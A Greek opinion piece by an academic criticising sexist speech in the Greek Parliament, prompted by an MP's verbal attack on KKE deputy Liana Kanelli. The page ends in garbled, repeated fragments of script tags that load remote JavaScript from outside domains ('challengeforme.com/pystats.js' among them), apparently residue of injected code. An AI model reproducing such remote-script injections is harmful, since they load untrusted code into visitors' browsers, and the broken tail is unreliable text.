Γλωσσικός σεξισμός και Κοινοβούλιο… Μαρία Γκασούκα

Πρωτοφανές επεισόδιο στη Βουλή. Στύλιος σε Κανέλη: Θα με κάνεις Κασιδιάρη (Βίντεο)

Η προχθεσινή ακραία σεξιστική λεκτική επίθεση του Γιώργου Στύλιου στη βουλεύτρια του ΚΚΕ Λιάνα Κανέλλη ήρθε να προστεθεί στη μακρά σειρά ανάλογων φαινομένων λεκτικής βίας, τα οποία προσβάλλουν κάθε έννοια κοινοβουλευτικού ήθους και ισότητας. Αυτή τη φορά υπήρξε αντίδραση και είναι παρήγορο, αρκεί να μην είναι ευκαιριακό.

Ο σεξισμός χαρακτηρίζει τον Λόγο που αρθρώνεται στο εθνικό Κοινοβούλιο κι αυτό δεν είναι τυχαίο. Αρκεί να θυμηθούμε πως ο Λόγος (Discourse) και η γλώσσα απηχούν ιεραρχημένες / εξουσιαστικές κοινωνικές πραγματικότητες και δεν είναι «αθώες» ως προς τις ανισότητες και διακρίσεις που συνδέονται και με τα φύλα. Αντίθετα συχνά αποτελούν το όχημα διά του οποίου αναπαράγεται και διαιωνίζεται, ανάλογα με τις ιστορικές και πολιτιστικές συνθήκες, το πλέγμα των κυρίαρχων κάθε φορά προκαταλήψεων και στερεοτύπων.

Στην περίπτωσή μας η επίθεση Στύλιου εδράζεται σε δύο στερεοτυπικές αντιλήψεις:

α. Πως η Βουλή ειδικότερα και η πολιτική ευρύτερα είναι ένας αρσενικός χώρος στον οποίο η παρουσία των γυναικών αποτελεί παρέκκλιση (πόσες φορές δεν ακούστηκε η προτροπή στις γυναίκες – μέλη της να αφήσουν τη Βουλή και να πάνε να πλύνουν τα πιάτα τους).

β. Η σιωπηρή κοινωνική αποδοχή με την οποία κοινωνικοποιήθηκαν έως πρόσφατα γενιές και γενιές παιδιών στη χώρα μας, πως δηλαδή η βία αποτελεί μέσο σωφρονισμού των «αδύναμων» σωματικά και, κυρίως, ηθικά γυναικών από τους άνδρες – φορείς της εξουσίας σε κάθε της έκφανση. Έως πρόσφατα ποιος/ά αντέδρασε όταν ο πατέρας ή/και ο αδελφός έδερναν τις συζύγους, τις κόρες και τις αδελφές; Ήταν πάντοτε «οικογενειακή υπόθεση», το τόνιζαν και τα αστυνομικά όργανα στις ελάχιστες γυναίκες που αποφάσιζαν να το καταγγείλουν. Ο Κασιδιάρης άλλωστε είναι εκτός από ναζιστικό πρότυπο και το πατριαρχικό ματσό πρότυπο που «γ… και δέρνει» και, από ότι κατάλαβα σε ό,τι αφορά στο τελευταίο, δεν αποκλείεται και το κρυφό πρότυπο του σεξιστή πρώην υπουργού.

Το προχθεσινό συμβάν δεν είναι απλό. Το Κοινοβούλιο αναπαράγει την κοινωνική πραγματικότητα και επιδρά σε αυτήν. Αν δεν υπάρξει αντίδραση από τις ίδιες τις βουλεύτριες που βρίσκονται σε αυτό κι αν δεν υπάρξει μέριμνα αντιμετώπισης γενικότερα του σεξισμού στο πλαίσιό του που να αποτυπώνεται στον κανονισμό λειτουργίας του, θα εξακολουθήσει να αποτελεί αποτρεπτικό παράδειγμα συμμετοχής των γυναικών στην κεντρική πολιτική σκηνή. Γιατί, όπως επισημαίνει και η Παυλίδου, «ο γλωσσικός εξοβελισμός των γυναικών οδηγεί στον συμβολικό αποκλεισμό τους από όλα τα πεδία και τις δραστηριότητες της κοινωνίας που χαίρουν κάποιας αναγνώρισης ή αξίας».

* Η Μαρία Γκασούκα είναι αναπληρώτρια καθηγήτρια του Πανεπιστημίου Αιγαίου___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >